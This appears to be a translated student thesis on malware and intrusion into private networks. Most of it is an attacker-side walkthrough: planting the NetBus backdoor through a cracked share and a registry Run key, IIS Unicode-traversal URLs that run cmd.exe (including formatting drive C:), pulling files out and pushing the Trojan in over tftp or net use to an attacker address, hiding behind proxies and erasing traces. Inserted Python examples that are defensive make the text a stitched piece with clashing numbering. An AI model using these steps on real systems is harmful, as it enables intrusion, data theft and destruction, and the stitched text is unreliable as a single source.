
TABLE OF CONTENTS

CONCLUSION

A Study of Malicious Software and Methods of Intruding into Private Networks Connected to the Internet

Preface

The purpose of networking is to let many people share resources from different geographical locations. Resources are therefore widely dispersed, and the inevitable consequence is that they are easy to compromise, with resulting loss of data and information. The wider the exposure, the easier the attack: that is the rule. Every threat on the network can be dangerous: a small flaw in a system will be exploited with high frequency, and a large one causes large damage immediately. In short, on a scale as large as the Internet, every gap or system flaw carries the same risk of causing damage. According to CERT (Computer Emergency Response Team), the number of reported attacks and unauthorised network accesses was:
- 1989: 200 incidents
- 1991: 400
- 1993: 1400
- 1994: 2241
- 1998: 3734
- 1999: 9589
- 2000: 21756
- 2003: 137529
- 2005: 535000
So the number of attacks keeps rising, and at the same time the techniques keep changing. This is easy to understand: every issue has two opposing sides. As information technology and the Internet grow explosively, they inevitably bring with them theft, attacks and destruction of information on the network.

Student: Vu Thi Thu Huong - Class CT 702 - DH DLHP (Haiphong Private University)

It is therefore important and necessary to study the methods that criminals commonly use to attack and damage private computer networks once those networks are connected to the international Internet; on that basis, effective countermeasures can be devised. The topic "A study of some malicious software and methods of intruding into private networks" was proposed and carried out in order to examine some malicious software and to study some intrusion methods against private networks that are currently in wide use. My work consists of four chapters and a conclusion:
Chapter 1: Some attack methods and computer network intrusion techniques
Chapter 2: Some principles of attacking computer networks
Chapter 3: Analysis of some sample software
Chapter 4: Some specific approaches to attacking computer networks
Of these I go into depth in chapters 3 and 4. Studying and analysing network attack methods is a very difficult task, especially for me. So although I have made every effort, my time and knowledge are limited, and the reference material is mostly in English and French, so my findings are not yet deep or comprehensive. I very much hope for guidance from my teachers and fellow students. I sincerely thank you.

Student Vu Thi Thu Huong



Chapter 1. SOME ATTACK METHODS AND NETWORK INTRUSION TECHNIQUES


1.1 The current state of criminal attacks on the network

The strong growth and wide influence of the Internet have produced a new class of people in computer networking: hackers (people with a very great passion for computers and information technology). Hackers are divided into two camps: white-hat hackers and black-hat hackers. Most attacks on the network are carried out with one or more software tools. In this project I study malicious software. Malicious software is software designed and built for the purpose of attacking, causing damage or illegally seizing the resources of the target computer (the computer under attack). Such software is usually hidden or disguised as legitimate software and enters the target computer openly or secretly. Different malicious programs have different methods and different potential for harm.

Attacks on the network are growing in both scale and danger. In the future, virus writers may gain more control over their viruses after releasing them on the network. More and more computer worms contain a backdoor, and their authors can upgrade them directly to get past anti-virus software or to add features. Worms can even set up private communication channels among themselves in order to regroup and upgrade. This not only helps them evade detection by anti-virus programs but also increases their destructive power considerably. Today network attacks are no longer just a game for hackers: many countries exploit this capability to serve political and military aims. In many countries, especially developed ones, computers are used everywhere and in every field, including national security and defence, so the potential for damaging an adversary through attacks on telecommunications and computer networks is enormous. Countries now have electronic network warfare departments, and each year countries such as China, Taiwan, South Korea and Thailand spend hundreds of millions of US dollars on this research (according to the Australian science journal, issue 9, 2005).

An attack on the network aimed at a computer system consists of actions intended to affect the stability of the system, to gain unauthorised access to its resources, or to falsify or steal information. Attacking over the network is hard. Whether an attack can be carried out, and whether its success is assured, depends on many factors:
- Objectively, it depends on the system being attacked.
- Subjectively, it depends on the attacker's ability.
The tools used are an extremely important component. One can use existing tools (of which there are already quite a few) or build new ones, according to the purpose, complexity and effectiveness desired. Winning an attack involves many difficulties, which is reasonable: the adversary, in protecting their system, tries as hard as the attacker does to keep themselves safe. Success is unlikely without studying the adversary and preparing thoroughly. Usually many methods must be combined, including organisational measures as well as technical solutions. Some important attack methods and network intrusion techniques are as follows.

1.2 Attack methods

1.2.1 Direct attack

1.2.2 Eavesdropping

1.2.3 Address spoofing
Two forms of attack are based on address spoofing:
- Spoofing the sender's address (source address).
- Man in the middle.

1.2.4 Disabling the functions of the target system
- Denial of service (DoS).
- Network denial of service.

1.2.5 Exploiting the system administrator's mistakes

1.3 Network intrusion techniques

1.3.1 Snooping

1.3.2 Spoofing

1.3.3 Agents

Chapter 2. SOME PRINCIPLES OF NETWORK ATTACK


2.1 Finding weaknesses in the adversary's security mechanism

To attack a target successfully, that target must be studied very carefully. A system that provides computer security usually includes the following main elements:
- Organisational elements.
- Technical and technological elements.
The purpose of target reconnaissance is to use various means to find the weaknesses in the security system (organisational as well as technical) in order to decide on a suitable attack method and to plant an agent on the adversary's machine.


Every computer system has weaknesses: security holes. Finding these holes is an important guarantee of an attack's success. The important and essential questions, however, are where to look for the holes and how. There are two approaches: one from the tactical angle and one from the technical angle. Some forums that discuss security flaws: the Bugtraq forum (http://Packetstorm.secuify), the Tlsecurity forum (http://www.tlsecurity.net) and the hackerVN forum (http://www.hackerVN.net).

2.2 Making full use of backdoors in an attack

The backdoor is a common tool among hackers. Breaking into a computer system is in general very hard, so after breaking in one wants to leave behind some tool that makes later intrusions easy. The backdoor was born to meet that need. In short, a backdoor or Trojan is understood as:
- An unauthorised program (usually hiding under the name of a legitimate program) that performs functions the user neither knows about nor wants.
- A legitimate program into which some illegitimate code has been planted, that code performing functions the user neither knows about nor wants.
The operating principle of a backdoor is quite simple: when run on the host, it tries not to do anything suspicious, stays silently resident in memory, and opens a back door that lets the attacker connect and control the machine. Because of this operating principle a backdoor is also called a remote administration tool (RAT). A typical backdoor therefore has two components:
- The Server component sits on the host (victim) machine.

- The Client component sits on the attacking machine.

[Figure: the attacking machine and the host, showing normal communication alongside the backdoor communication between the client and the backdoor server]
Figure 3.1.1: Operating model of a backdoor

Attacking with a backdoor calls for special attention to two points. A strong backdoor must have a small, compact Server component capable of carrying out many functions at high speed so as not to arouse suspicion. The Server must also be able to disguise and conceal itself so that it is not detected. Several common techniques are used:
- The backdoor is designed to modify its own command-line parameters at run time so that it carries a different (legitimate) name.
- The backdoor modifies some routines in the system libraries so that they no longer report every running process, including the backdoor server's process.
- The backdoor is attached to an interrupt-handling routine so that it does not appear in the process table.
- The attacker may modify the operating system kernel to hide only certain processes (in this case the backdoor server's process).
The functions of a backdoor are determined by the server component. Common functions are:
- Keylogging (capturing keystrokes).
- Screen capturing.


- Password stealing: stealing passwords of all kinds.
- File downloading: downloading one or more files from the target machine.
- File uploading: uploading one or more files to the host.
- Running applications.
- File managing.
- Port redirecting.
There are now many different kinds of backdoor on the network, and they are continually upgraded. Some typical backdoors: NetBus and Back Orifice. Other backdoors no less dangerous include Hack attack, Girlfriend, Netthief, Netspy, NetMonitor and Socket de Trojen (France). In short, the backdoor is an effective attack tool that can be exploited to the full in the service of one's strategic needs, and it is also a dangerous weapon that one must guard against so that others do not use it to attack oneself.

2.3 Making use of available tools

Using the capabilities of tools to the full is an essential principle when carrying out a network attack. Tools are generally used to simplify particular tasks within the overall process, to increase speed and to ensure the attack is effective. From the tools supplied by the operating system itself to those published by third-party vendors, security groups, hackers or hacker organisations, all can be used in an attack provided they are applied sensibly and combined effectively.

Here is how tools are used to plant a Trojan on another machine through that machine's shared resources. Suppose one wants an important document stored on drive D:, and drive C: of the target machine is not fully shared. To exchange information with other machines, however, drive C: is shared with a password, and that password is changed regularly. The documents can be taken by first using a share-password cracking tool, Passware Kit (http://www.LostPassword.com). This cracking tool works very quickly and effectively; in most cases it finds the resource-sharing password within a few minutes, depending on the complexity of the password. Then one simply copies the server file of NetBus 1.7 (patch.exe) into any directory on C:, say C:\windows\. Next, to activate NetBus, one must use the Windows Remote Registry Service to modify the host's Registry so that patch.exe runs automatically from the next start-up onwards. Once this service is installed on the host, Windows regedit.exe can be used to load and modify that machine's Registry. Add a value under the key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run or HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run to run patch.exe:
Value type: String
Value name: Patch
Value: C:\windows\patch.exe
The next time the target machine is running, we run the NetBus client on our own machine, connect to it and can do a great many things, limited only by the capabilities of the NetBus server.

2.4 Exploiting the target's weaknesses to the full, especially holes in the system and its services

Security holes are flaws in a system that others can use to do things the system was never meant to provide, usually for the purpose of attack. In practice, operating systems, web browsers, database systems and even anti-virus programs all have flaws to a greater or lesser extent.

The table below lists some of the products with the most security holes.

No. | Product | Number of security holes
1 | Microsoft Internet Explorer | 69
2 | Microsoft Windows 98 | 35
3 | Microsoft Windows 95 | 30
4 | Microsoft Outlook | 28
5 | Netscape Navigator | 22
6 | Microsoft Outlook Express | 16
7 | Microsoft Windows ME | 10
8 | Microsoft Excel | 10
9 | Microsoft Word | 9
10 | Qualcomm Eudora | 8
11 | Symantec Norton AntiVirus | 7
12 | AOL Instant Messenger | 6
13 | Mirabilis ICQ | 6
14 | Sun Java | 5
15 | Microsoft PowerPoint | 5

Figure 2.3.1: Some of the software with the most security holes (source: www.securityfocus.com, November 2001)

In this project I present in detail the method of attacking an IIS server by exploiting the Unicode bug. The contents of drive C: on an IIS 5.0 server can be viewed with the following URL typed into the browser's address bar, assuming the site's address is http://www.iisaffected.com, even though a CGI error message is still returned:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
Like many earlier web servers such as Compaq Insight Manager 4.x, MS Index Server 2.0 and HP JetAdmin 5.6, IIS suffers from a flaw called the dot dot directory traversal attack (climbing back up the directory tree by means of the dot dot flaw). When one of these servers receives a URL containing the substring ../ (or ..\, depending on the server), each such substring moves the server's current path up to its parent directory (the equivalent of the DOS command cd..) and gradually out of the web directory, which is of course not allowed.


Combined with a suitable path at the end of the URL, this lets the attacker execute some command on the web server. IIS and some other web servers fixed the flaw by checking the URL typed in the browser's address bar and refusing to execute it if it contains the substring ../ or ..\. Hackers, however, devised a trick using Unicode to slip past this defence. The Unicode standard from version 2.0 onwards allows one character to have several different encodings, and that is exactly what is exploited. Such an encoding is called a very long Unicode representation. On receiving a URL, a good server must reject these long encodings and allow only one canonical encoding. IIS does not do that: on receiving a URL it first checks directly for the substrings / and \ and for their usual Unicode encodings (the shortest Unicode representation). If such substrings are present, IIS refuses access; that is how IIS protects itself from the dot dot directory traversal attack. Otherwise, IIS carries out the request in the URL, and only at that point does it decode the long encodings of the slash characters (slash / and backslash \) in the URL, which of course become the characters / and \ that IIS can no longer check. So instead of putting the substrings ../ or ..\ into the address bar, one replaces them with a Unicode string containing a very long encoding of the / or \ character, such as %c1%1c, ..%c0%f9, ..%e0%80%af or ..%fc%80%80%80%80%af; IIS is fooled into treating it as a valid URL that may be executed. Combined with the default settings on the server, this is how one's own commands are executed while the server still considers them legitimate. Because %c1%1c is a very long Unicode expression for the / character that IIS does not recognise, the command line above is allowed to execute. On execution, the string %c1%1c is translated back into the plain / character (but IIS has already passed the checking stage and does not check again), and the address actually accessed becomes in effect:
http://www.iisaffected.com/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\
At this point the classic dot dot directory traversal attack appears, beyond IIS's ability to protect itself. The URL above, with its two ../ substrings, moves the directory holding the URL http://www.iisaffected.com/scripts/ (by default C:\inetpub\scripts) up two directory levels, that is, out of the directory reserved for the web (which is not permitted) and back to the root directory C:. The rest of the URL appends the default path to the Windows NT command interpreter (winnt/system32/cmd.exe) and runs the command dir C:\ to list the contents of drive C:. Since there are many very long Unicode representations of the / and \ characters, and quite a few default settings when Windows NT and IIS are installed, combining them yields many different URLs usable for intrusion. The table below lists some common ones:

No. | URL
1 | /scripts/..%0%af../winnt/system32/cmd.exe?/c+
2 | /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
3 | /scripts/..%c1%fc../winnt/system32/cmd.exe?/c+
4 | /scripts/..%c0%9c../winnt/system32/cmd.exe?/c+
5 | /scripts/..%c0%9f../winnt/system32/cmd.exe?/c+
6 | /scripts/..%c1%9a../winnt/system32/cmd.exe?/c+
7 | /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
8 | /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
9 | /scripts/..%e0%af../winnt/system32/cmd.exe?/c+

Figure 2.3.2: Some URLs used to exploit the Unicode bug on IIS

By the means above, one holds a great many rights over the system: one can view the contents of the disk and of some important files, delete data on the hard disk and even reformat the host's disk using DOS commands. Continuing with the URL above, to view the contents of a file, say autoexec.bat, type in the browser:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:\autoexec.bat
To reformat drive C:, type:

http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+format+c:\+/q
One can also gain write access to the disk and modify or create files on the server. Direct access through cmd.exe does not allow this, but if one makes another copy of the interpreter and uses that copy, it is considered legitimate. This tactic is carried out with the following commands:
+ Step 1: Make a new copy, cmd1.exe, of the DOS command interpreter:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt/system32/cmd.exe+c/winnt/system32/cmd1.exe
+ Step 2: Append some commands to the file autoexec.bat:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+>>+c:\autoexec.bat+@echo+Hihihi,KO
At this point the nature of the Unicode bug on IIS and the specific method of exploiting it are understood. It must be stressed that this is a very serious security flaw, for the following reasons:
+ It is easy to exploit.
+ It carries the risk of the attacker gaining complete control of the system.
Microsoft has now released patches for this flaw. For IIS 4.0 the fix is distributed at:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862
and for IIS 5.0 the fix is at:
http://www.microsoft.com/windows2000/downloads/critical/q269862

2.5 The principle of safety


The attacker's task is to keep the adversary from learning the original packet, or to ensure that the packet's source address is not the attacker's own machine. A simple and effective method is to use anonymous proxy servers.

[Figure: our machine sends the request to the proxy, the proxy sends the request on to the adversary's machine, and the reply returns along the same path]
Figure 3.5.1: Model of communication between two machines through a proxy

To keep up to date with information on free proxies, the sites http://www.blackcode.com and http://www.freeproxies.com can be visited regularly. Some programs can also be used to create virtual proxies on one's own machine; a typical one is Anonymity 4 Proxy.

2.6 The principle of combining attacks

While carrying out an attack, depending on the target and the tools at hand, one can use many different measures in different orders to achieve the best result. The diagram below shows the typical order in which the principles above, camouflage included, are applied in carrying out a specific attack:
1. Discover weaknesses and security holes in the target system.
2. Use tools to exploit the target system's weaknesses.
3. Carry out the attack measures and collect information.
4. Create a tunnel (back door) and plant an agent if possible.
5. Erase traces.
Figure 3.6.1: Order in which the attack principles are applied


Chapter 3. ANALYSIS OF SOME SAMPLE SOFTWARE

3.1 NETBUS

3.1.1 Concept
NetBus is a tool for administering and remotely controlling a target computer (the computer to be attacked) on the same network or over the Internet.

3.1.2 Structure
NetBus has two parts, a server component and a client component:
1. The server component, Patch.exe, installed on the target machine.
2. The client component, Netbus.exe, run on one's own (the attacking) machine.

3.1.3 Steps of use
Step 1: Start up.
Step 2: Connect.
Step 3: Carry out the functions.

[Figure: interface screen of the client component (netbus.exe)]

3.1.4 Usage guide


1. Access control for the server component: Server admin
2. Open and close the CD-ROM drive: Open/Close CD-ROM
3. Show an image: Show Image
4. Swap the mouse buttons: Swap mouse
5. Run a program on the target machine: Start program
6. Show a dialog box: Msg manager
7. View the server machine's screen: Screendump
8. View information about the target machine: Get info
9. Play a sound file: Play sound
10. Control the target machine: Exit windows
11. Send a message: Send texts
12. Activate or close a window: Active windows
13. Set the mouse cursor position: Mouse pos
14. Capture the user's keystrokes on the target machine: Listen
15. Record sound from the target machine: Sound system
16. Control the mouse: Control mouse
17. Open a web page: Go to URL
18. Control the keyboard: Key Manage. Choose Disable keys and enter the keys to be disabled; the following window then appears:
[Figure: the Key Manage window]
19. Work with files: File manage


3.2 WS_Ping ProPack (http://www.ipswitch.com)

WS_Ping ProPack is a collection of Internet diagnostic and information tools:
- Info provides information (including host name, IP address, contact details and network performance) about a particular host or network device.
- Time synchronises your local computer's clock with a remote server's time, and lets you query the time of several servers and compare the results.
- HTML is a diagnostic tool that lets you query a web address (URL) and see the full header information and page data returned by the HTTP server.
- Ping is a network diagnostic tool that confirms connectivity to a particular system on the network.
- Traceroute is a network diagnostic tool that lets you trace and see the actual route an IP packet takes to a host on the Internet.


- Lookup queries domain name servers on the Internet for information about hosts and other name servers.
- Finger queries servers on the Internet for information about users registered on them (provided a Finger server is running on the remote host).
- Whois queries the databases at NICs (Network Information Centers) for information on the networks, hosts and users of any organisation registered with a NIC.
- LDAP queries directories on the Internet that use the LDAP standard. Many organisations use LDAP to make user information (such as names and e-mail addresses) available on the Internet and on their intranets.
- Quote returns quotations from a Quote server.
- Scan searches a given network and lists the TCP/IP hosts it finds. Scan can also identify the services (such as FTP and HTTP) on each host and list the active ports on each host, giving a quick summary of what is on your network and which network services are running.
- SNMP queries values on devices that implement the Simple Network Management Protocol. SNMP can give the closest view of the hosts and devices on your network by providing status and configuration information about the current system.
- WinNet scans your local network and lists the Microsoft Windows network devices and shared resources.
- Throughput tests the data transfer rate between your computer and a remote computer.
- About shows network information about your local computer and local network, as well as information about WS_Ping ProPack.


Chapter 4. SOME SPECIFIC APPROACHES TO ATTACKING COMPUTER NETWORKS

4.1 ATTACKING THE TARGET MACHINE BY TAKING CONTROL OF THE SYSTEM

To take control of a server, one must gain the ability to download and upload files. To do that, one first needs to understand some of the protocols used in network communication, so as to apply them to the attack.

4.1.1 The HTTP protocol
HTTP (HyperText Transfer Protocol) is the standard protocol on the worldwide web that allows hypertext documents with their various tags to be transferred. It works on a request/response mechanism. HTTP is usually carried over a TCP/IP connection and requires no authentication information, so it is considered an anonymous protocol. The methods most often used in HTTP are POST, GET and HEAD.

4.1.2 The TFTP protocol
TFTP (Trivial File Transfer Protocol) is implemented on top of UDP (User Datagram Protocol). TFTP allows files to be exchanged and moved across a network using UDP. Designed for compactness and ease of use, TFTP lacks many features of FTP, the standard file transfer protocol: all it allows is reading and writing files between remote machines, without showing directory listings or providing user authentication. TFTP performs the access itself and does not address the question of permissions on the files.


4.1.3 The NetBIOS protocol
NetBIOS (Network Basic Input/Output System) is a communication service at the session layer of the seven-layer OSI model. It lets a user share resources on their machine (files, directories, disks, printers and even COM ports) with everyone on the network. This protocol is also known as the SMB (System Message Block) standard. SMB-based networks use several protocols built on NetBIOS, such as NetBIOS over NetBEUI (NetBIOS Extended User Interface) and NetBIOS over TCP/IP. NetBIOS thus provides applications and a programming interface for resource-sharing services over several lower-level protocols, including TCP/IP. Because NetBIOS over TCP/IP runs on the TCP/IP protocol family, the standard family on the Internet, resources can be shared even across the Internet. If the host one intends to attack has NetBIOS over TCP/IP installed, this can be exploited in the attack, especially once the Unicode bug has been exploited on that system.

Now let us get specific and find a way to download and upload files on an IIS server that has the Unicode bug. By default, when IIS version 4.0 or later is installed, an FTP server is installed automatically on the system. The FTP server lets anonymous users access the directory \inetpub\ftproot\ and download files from it (but not upload files). Taking advantage of this, to download some file from a host with the Unicode bug, two steps are carried out:
+ Step 1: Copy the file to be downloaded (say c:\system.ini) into the directory \inetpub\ftproot\ with the URL:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\system.ini+c:\inetpub\ftproot\
+ Step 2: Log in to the host with anonymous FTP and download the file system.ini.


Combined with the dir command presented above (section 3.4), this method lets one obtain most of the important files on the attacked server, which can be called a major success for the attacker. The method is limited, however, in that it does not allow every file to be downloaded. Specifically, Windows NT and Windows 2000 are known to keep a copy of the SAM (Security Account Manager) file in the directory \WINNT\repair\; it stores information about the system's user accounts, including usernames and encrypted passwords. If this file could be copied, a password-cracking program could be used to decrypt it, giving complete and regular control over the website. But the command to copy the SAM file does not work. If the following command line is typed into the address bar:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\WINNT\repair\SAM+c:\inetpub\ftproot\
the browser reports the error:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied.
0 file(s) copied.
The problem is that escaping the web directory through the Unicode bug only grants the system access rights of IUSR_machinename, whereas access to the directory winnt\repair, where the all-important SAM files are kept, is possible only with Administrator rights. To get there, one needs to upload some tools that support remote probing. Since the FTP server does not let users upload files to the system, another method must be used. This can be done through the following steps:


Step 1: Share a drive on your own machine, say C:, with Full access and no password protection. Suppose the share name is MyDisk.
Step 2: Use the net use command on IIS to map MyDisk (that is, drive C: on your own machine) to a new drive on the host, say G:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+net+use+G:+\\203.160.1.94\MyDisk
(taking your own machine's IP address to be 203.160.1.94). Whether this command was executed and succeeded can be checked with the DIR command:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+g:\
If the listing shown by the browser matches the contents of drive C: on your own machine, the net use command succeeded: the host now has a drive G:, and every change to G: on the host is a change to your own C:, and vice versa.
Step 3: Find a remote-control program such as WinVNC (Virtual Network Computing) from AT&T Laboratories Cambridge (http://www.uk.reseach.att.com/vnc), PC Anywhere from Symantec (http://www.symantec.com) or one of the Trojan horse programs, copy it to C: (G:\ on the host) and use the browser to copy it onto the server's real hard disk. Suppose one's own C: holds the Trojan NetBus 1.7 with its server component Patch.exe; the following command is issued in the browser:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+g:\Patch.exe+c:\Patch.exe
Step 4: Naturally one does not really want to share the drive for everyone to see and use freely. Now use the command net use G: /delete on the server to break the link to your own C: drive:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+net+use+g:+\delete

Better still, stop sharing drive C: altogether to be safe; otherwise another hacker may scan for shares, find yours, and connect to damage your machine.
Step 5: Run the server component of the remote-control program on the host and the client component on your own machine, connect, and control the host.

This method is feasible. It does not, however, work on Windows 2000 and IIS 5.0, because the permission scheme in Windows 2000 is stricter than in Windows NT 4.0. In that case another weapon is used: the TFTP presented above. One needs a TFTP server program running on one's own machine and uses the TFTP client on the host system to connect back and transfer files. Here the program TFTPD32, version 1.2, by Philippe Jounin is used; TFTPD32 communicates on TCP port 69. Now the TFTP client is run on the host and used to download and upload files easily. Since tftp.exe is installed by default in \Winnt\system32\, tftp's Put and Get commands can be used directly to download or upload files. For example, the command:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp+i+203.160.1.94+Put+c:\system.ini+c:\stolen\system.ini
downloads the file system.ini from the host into the directory c:\stolen\ on one's own machine, while the command:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp+i+203.160.1.94+Get+c:\trojans\netbus1.7\patch.exe+c:\patch.exe
uploads the NetBus 1.7 server, patch.exe, to drive C:\ on the host. Finally, the NetBus Trojan is run and the host on which IIS is installed is controlled:
http://www.iisaffected.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\patch.exe
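The traversal check described in section 2.4, and relied on by every request in section 4.1, fails because the server inspects the path before it decodes multi-byte sequences. The following Python is an added example, not code from the thesis: it models both orders of operations on the thesis's own sample URL, assuming the default virtual directory C:\inetpub\scripts that the text names, with a constructed non-validating decoder standing in for the unpatched server's, and shows that decoding strictly first (rejecting overlong or malformed UTF-8, as a patched server must) stops the request.

```python
import re
from urllib.parse import unquote_to_bytes

# Virtual directory the thesis's URLs go through, and its default location on
# disk as the text states it (C:\inetpub\scripts).
VDIR_URL = '/scripts'
VDIR_DISK = ['C:', 'inetpub', 'scripts']


def lenient_decode(data):
    """Constructed model of a non-validating UTF-8 decoder (the behaviour the
    text attributes to the unpatched IIS): the lead byte fixes the sequence
    length, the payload bits are taken from every following byte, and neither
    the 10xxxxxx continuation marker nor the shortest-form rule is checked."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            n, cp = 1, b
        elif b >= 0xFC:
            n, cp = 6, b & 0x01
        elif b >= 0xF8:
            n, cp = 5, b & 0x03
        elif b >= 0xF0:
            n, cp = 4, b & 0x07
        elif b >= 0xE0:
            n, cp = 3, b & 0x0F
        elif b >= 0xC0:
            n, cp = 2, b & 0x1F
        else:
            n, cp = 1, b          # stray continuation byte, passed through
        for c in data[i + 1:i + n]:
            cp = (cp << 6) | (c & 0x3F)
        out.append(chr(cp) if cp < 0x110000 else '\ufffd')
        i += n
    return ''.join(out)


def resolve(base, path, floor):
    """Apply the '.' and '..' segments of path on top of base (a list of path
    components). Returns None if the path climbs above the first `floor`
    components, otherwise the resolved component list."""
    parts = list(base)
    for seg in re.split(r'[\\/]+', path):
        if seg in ('', '.'):
            continue
        if seg == '..':
            if len(parts) <= floor:
                return None
            parts.pop()
        else:
            parts.append(seg)
    return parts


def _relative_bytes(url):
    path = url.split('?', 1)[0]
    if not path.startswith(VDIR_URL + '/'):
        raise ValueError('example only models requests under ' + VDIR_URL)
    return unquote_to_bytes(path[len(VDIR_URL):])


def vulnerable_server(url):
    """Order of operations the text describes: the traversal check runs on the
    single-byte-decoded path, the multi-byte decode happens only afterwards.
    Returns the on-disk path the request ends up at, or 'REJECTED'."""
    raw = _relative_bytes(url)
    # Pass 1: %c1%1c is still an opaque pair of bytes here, so the segment
    # made of '..', those two bytes and '..' is not seen as a parent reference.
    if resolve(VDIR_DISK, raw.decode('latin-1'), len(VDIR_DISK)) is None:
        return 'REJECTED'
    # Pass 2: the decode turns that segment into '..\..' and the file system
    # honours it; only the drive root itself is a hard floor.
    on_disk = resolve(VDIR_DISK, lenient_decode(raw), 1) or VDIR_DISK[:1]
    return '\\'.join(on_disk)


def hardened_server(url):
    """Decode first, strictly, then check. Python's UTF-8 codec refuses
    overlong forms and bad continuation bytes, which is the property a
    patched server needs; the traversal check then sees the canonical path."""
    raw = _relative_bytes(url)
    try:
        rel = raw.decode('utf-8')
    except UnicodeDecodeError:
        return 'REJECTED'
    on_disk = resolve(VDIR_DISK, rel, len(VDIR_DISK))
    return 'REJECTED' if on_disk is None else '\\'.join(on_disk)


if __name__ == '__main__':
    # The thesis's sample request, a plain traversal, and an ordinary request.
    for u in ('/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\\',
              '/scripts/../../winnt/system32/cmd.exe',
              '/scripts/sub/../tool.asp'):
        print(u, '->', vulnerable_server(u), '|', hardened_server(u))
```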

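Every step of the procedure in section 4.1 leaves a request in the web server's log, which is where a defender finds it. This added example (not from the thesis) parses a constructed IIS W3C extended log excerpt, tags the requests that carry malformed UTF-8, reach cmd.exe, or run the commands the text lists (dir, net use, tftp, a dropped binary), and grades each client by the stages observed; the log lines, client addresses, timestamps and status codes are invented.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed IIS 5.0 W3C extended log excerpt, not taken from the thesis:
# client addresses, timestamps and status codes are invented; the request
# shapes follow the steps the text describes (dir, net use, tftp, run binary).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-11-05 10:21:07 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir+c:\ 200
2001-11-05 10:22:31 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+net+use+G:+\\192.0.2.10\MyDisk 502
2001-11-05 10:23:02 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp+-i+192.0.2.10+Get+c:\tools\patch.exe+c:\patch.exe 502
2001-11-05 10:24:45 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+c:\patch.exe 502
2001-11-05 10:25:10 198.51.100.7 GET /scripts/report.asp id=42 200
2001-11-05 10:25:12 198.51.100.7 GET /images/logo.gif - 200
"""

# cmd.exe verbs that mark the phases of the procedure in section 4.1.
VERB_STAGE = {
    'dir': 'recon', 'type': 'recon',
    'net': 'staging', 'tftp': 'staging', 'copy': 'staging', 'echo': 'staging',
    'format': 'destructive', 'del': 'destructive', 'rd': 'destructive',
}
STAGE_ORDER = ['recon', 'staging', 'execution', 'destructive']


def parse_w3c(text):
    """Yield one dict per request line, naming columns from the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith('#Fields:'):
            fields = line.split()[1:]
        elif line and not line.startswith('#') and fields:
            values = line.split(' ')
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def classify(rec):
    """Return the detection tags for one request; an empty list means benign."""
    tags = []
    stem, query = rec['cs-uri-stem'], rec['cs-uri-query']
    raw = unquote_to_bytes(stem)
    try:
        decoded = raw.decode('utf-8')
    except UnicodeDecodeError:
        # A strict decoder refuses overlong or malformed sequences such as
        # %c1%1c; no legitimate client has a reason to send one.
        tags.append('malformed-utf8')
        decoded = raw.decode('latin-1')
    low = decoded.lower()
    if 'cmd.exe' in low or 'system32' in low:
        tags.append('shell-via-web')
    if query != '-':
        # For cmd.exe the query string is its command line, '+' standing for space.
        argv = query.replace('+', ' ').split()
        if len(argv) > 1 and argv[0].lower() == '/c':
            verb = argv[1].lower()
            if verb in VERB_STAGE:
                tags.append(VERB_STAGE[verb])
            elif verb.endswith('.exe'):
                tags.append('execution')   # runs a binary by path, e.g. a dropped server
    return tags


def analyse(text):
    """Run the rules over a log. Returns the per-request findings and, per
    client address, the attack stages seen, in procedure order."""
    findings, seen = [], defaultdict(set)
    for rec in parse_w3c(text):
        tags = classify(rec)
        if tags:
            findings.append((rec['time'], rec['c-ip'], tags))
            seen[rec['c-ip']].update(t for t in tags if t in STAGE_ORDER)
    summary = {ip: [s for s in STAGE_ORDER if s in st] for ip, st in seen.items()}
    return findings, summary


def severity(stages):
    """Grade a client by the furthest stage reached: a dropped binary being run
    is an incident, staging alone is an attempt worth blocking at once."""
    if 'execution' in stages or 'destructive' in stages:
        return 'critical'
    if 'staging' in stages:
        return 'high'
    return 'medium' if stages else 'info'


if __name__ == '__main__':
    found, per_client = analyse(SAMPLE_LOG)
    for time, ip, tags in found:
        print(time, ip, ', '.join(tags))
    for ip, stages in per_client.items():
        print(ip, '->', severity(stages), stages)
```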

4.2 COMBINING A SHARED-RESOURCE SCANNER WITH A PASSWORD CRACKER

This section describes an approach that combines a tool for scanning the shared resources on the target machine with a tool for cracking the password used to access the target machine, for the purpose of stealing information.

